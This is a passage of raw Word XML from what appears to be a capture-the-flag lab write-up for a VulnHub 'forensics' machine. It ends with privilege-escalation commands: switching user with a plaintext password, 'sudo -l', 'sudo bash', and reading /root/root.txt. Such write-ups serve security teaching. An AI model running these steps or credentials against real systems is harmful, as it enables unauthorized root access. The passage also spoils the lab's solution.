          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4ED92B" w14:textId="77777777" w:rsidR="0077076A" w:rsidRPr="0077076A" w:rsidRDefault="0077076A" w:rsidP="00A64B5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t xml:space="preserve"> forensics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE3BBB" w14:textId="77777777" w:rsidR="0077076A" w:rsidRPr="0077076A" w:rsidRDefault="0077076A" w:rsidP="00A64B5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>jeenaliisagoodgirl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B76718B" w14:textId="77777777" w:rsidR="0077076A" w:rsidRPr="0077076A" w:rsidRDefault="0077076A" w:rsidP="00A64B5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE9798" w14:textId="77777777" w:rsidR="0077076A" w:rsidRPr="0077076A" w:rsidRDefault="0077076A" w:rsidP="00A64B5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>sudo bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313A819B" w14:textId="3993BED8" w:rsidR="0077076A" w:rsidRPr="00A64B5F" w:rsidRDefault="0077076A" w:rsidP="00A64B5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740D34F0" w14:textId="6ACA17A4" w:rsidR="0077076A" w:rsidRPr="0077076A" w:rsidRDefault="0077076A" w:rsidP="00A64B5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A64B5F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8AD38D" w14:textId="19F3FDA1" w:rsidR="0077076A" w:rsidRPr="00A64B5F" w:rsidRDefault="0077076A" w:rsidP="00A64B5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0077076A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>cat root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4055C07C" w14:textId="36495ED9" w:rsidR="007E6720" w:rsidRDefault="007E6720" w:rsidP="0077076A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C88040" w14:textId="476F37A8" w:rsidR="007E6720" w:rsidRPr="007E6720" w:rsidRDefault="007E6720" w:rsidP="0077076A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E6720">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>And we have flag #4 and root!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DEB6AB" w14:textId="5319D9BD" w:rsidR="007E6720" w:rsidRDefault="007E6720" w:rsidP="0077076A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B0B27FD" wp14:editId="559AC5F8">
            <wp:extent cx="3714010" cy="47853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4399" cy="4824515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C30E50" w14:textId="0392E44D" w:rsidR="007E6720" w:rsidRDefault="007E6720" w:rsidP="0077076A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A4AD40" w14:textId="77777777" w:rsidR="007E6720" w:rsidRDefault="007E6720" w:rsidP="0077076A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E0B889" w14:textId="274FAAC1" w:rsidR="00211339" w:rsidRPr="00A64B5F" w:rsidRDefault="00A64B5F" w:rsidP="00A64B5F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-PH"/>
        </w:rPr>
        <w:t>End of the lab and this CTF Challenge!</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00211339" w:rsidRPr="00A64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E7B32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE389A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U3MjSyMAEiAyUdpeDU4uLM/DyQAqNaAGmDSqQsAAAA"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00211339"/>
    <w:rsid w:val="00211339"/>
    <w:rsid w:val="0077076A"/>
    <w:rsid w:val="007E6720"/>
    <w:rsid w:val="007F2F8A"/>
    <w:rsid w:val="008347A9"/>
    <w:rsid w:val="00A64B5F"/>
    <w:rsid w:val="00A66F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35B8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{889745C2-B5C0-4159-BC51-BB34D357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339"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00211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5438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1102146948">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="137577983">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1370377529">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="659965425">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1018114967">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1123159760">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1589340763">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1337460771">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="714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wnload.vulnhub.com/ha/forensics.ov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ffensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/autopsy" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html" TargetMode="Externa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66506F5D-A9C1-4EEB-B3D8-6E35227DA275}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B5A6EEA9-3894-4DEF-8922-4A6C3E020A97}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0928DC1A-7F8D-47D3-ABBC-1ECDBB826B6E}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <TotalTime>195</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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-11T07:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-11T10:27:00Z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